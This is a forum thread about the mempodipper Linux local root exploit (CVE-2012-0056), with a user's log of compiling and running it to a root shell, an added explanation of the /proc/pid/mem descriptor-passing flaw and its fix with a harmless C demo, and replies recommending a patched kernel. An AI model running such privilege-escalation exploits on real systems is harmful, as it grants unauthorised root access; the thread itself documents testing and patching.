# mempodipper - root exploit [CVE-2012-0056] [SOLVED]

## upengan78

More info:

http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=e268337dfe26dfc7efd422a804dbb27977a3cccc

On my gentoo -

 3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux

```
user@hostname:/nfs1 $ 12:08 PM]gcc -o mempodipper mempodipper.c
user@hostname:/nfs1 $ 12:08 PM]./mempodipper 
===============================
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =
===============================
[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x402240.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/12838/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x402234.
[+] Executing su with shellcode.
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),7(lp),10(wheel),18(audio),35(games),1015(qemu)
sh-4.1# uname -a
3.0.3-gentoo #2 SMP PREEMPT Fri Oct 7 11:22:18 CDT 2011 x86_64 Intel(R) Core(TM)2 CPU 6400 @ 2.13GHz GenuineIntel GNU/Linux
```

Last edited by upengan78 on Wed Jan 25, 2012 7:42 pm; edited 1 time in total
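The step that makes the log above work is the descriptor hand-off: the child opens `/proc/<parent pid>/mem`, ships the open descriptor to the parent over a socketpair with `SCM_RIGHTS`, and the parent then dup2's it onto stderr before exec'ing the setuid `su`. The permission check that was done when the child opened the file does not travel with the descriptor, which is what the linked commit addresses: after the fix the check is done at open time with ptrace-attach rights and the file is bound to the mm it was opened against, so a descriptor held across `execve()` keeps reading and writing the old VM rather than the new setuid one. The program below is an added example, not code from this thread or from mempodipper/zx2c4; it shows only the fd-passing primitive, with a pipe carrying a constructed message standing in for `/proc/<pid>/mem`, so it is safe to run on any Linux box. Function and constant names are my own.

```c
/* Added example (not mempodipper): pass an open file descriptor between
 * two processes with SCM_RIGHTS over an AF_UNIX socketpair.  The child
 * creates a pipe, writes a constructed message into it and sends the
 * read end to the parent; the parent reads the message through the
 * received descriptor.  Build: gcc -Wall -o fdpass fdpass.c */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <sys/wait.h>

/* Constructed payload for the demo; any bytes would do. */
static const char kMessage[] = "descriptor opened by child, read by parent";

/* Send one descriptor over a Unix-domain socket as ancillary data. */
static int send_fd(int sock, int fd) {
    char dummy = 'F';                       /* at least one byte of data is required */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    char cbuf[CMSG_SPACE(sizeof(int))];
    memset(cbuf, 0, sizeof cbuf);
    struct msghdr msg;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof cbuf;
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    cm->cmsg_level = SOL_SOCKET;
    cm->cmsg_type = SCM_RIGHTS;             /* kernel dup()s fd into the receiver */
    cm->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cm), &fd, sizeof(int));
    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Receive one descriptor; returns the new local fd number or -1. */
static int recv_fd(int sock) {
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    char cbuf[CMSG_SPACE(sizeof(int))];
    struct msghdr msg;
    memset(&msg, 0, sizeof msg);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof cbuf;
    if (recvmsg(sock, &msg, 0) != 1 || (msg.msg_flags & MSG_CTRUNC))
        return -1;
    struct cmsghdr *cm = CMSG_FIRSTHDR(&msg);
    if (!cm || cm->cmsg_level != SOL_SOCKET || cm->cmsg_type != SCM_RIGHTS)
        return -1;
    int fd;
    memcpy(&fd, CMSG_DATA(cm), sizeof(int));
    return fd;
}

/* Fork, have the child send a pipe's read end, read through it in the
 * parent.  Returns bytes read into buf (NUL-terminated) or -1. */
ssize_t pass_fd_demo(char *buf, size_t buflen) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                         /* child: open something, hand it over */
        close(sv[0]);
        int pfd[2];
        if (pipe(pfd) < 0) _exit(1);
        size_t len = sizeof kMessage - 1;
        if (write(pfd[1], kMessage, len) != (ssize_t)len) _exit(1);
        close(pfd[1]);                      /* data stays buffered in the pipe */
        int rc = send_fd(sv[1], pfd[0]);
        _exit(rc == 0 ? 0 : 1);             /* child's copy closes; in-flight fd keeps pipe alive */
    }
    close(sv[1]);                           /* parent */
    int fd = recv_fd(sv[0]);
    close(sv[0]);
    int status;
    waitpid(pid, &status, 0);
    if (fd < 0) return -1;
    ssize_t n = read(fd, buf, buflen - 1);
    close(fd);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* 1 if the parent read exactly the constructed message, else 0. */
int pass_fd_demo_ok(void) {
    char buf[128];
    ssize_t n = pass_fd_demo(buf, sizeof buf);
    return n == (ssize_t)(sizeof kMessage - 1) && strcmp(buf, kMessage) == 0;
}

int main(void) {
    char buf[128];
    ssize_t n = pass_fd_demo(buf, sizeof buf);
    if (n < 0) { perror("pass_fd_demo"); return 1; }
    printf("parent read %zd bytes via received fd: \"%s\"\n", n, buf);
    return 0;
}
```

The point to take away for reviewing similar kernel interfaces: a descriptor is a capability that outlives the identity checks made when it was created, so any check that only runs at `open()` has to be matched by binding the object to whatever it was authorised against (here, the mm at open time), or re-checked on every read and write.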

----------

## avx

Yeah, umh? Update your kernel, the recent versions (3.1, 3.2.1) are already patched.

----------

## upengan78

Thanks. I tried 3.1.6 and the exploit worked on it. So I put 3.2.1-gentoo-r2 on and all is good now.

----------

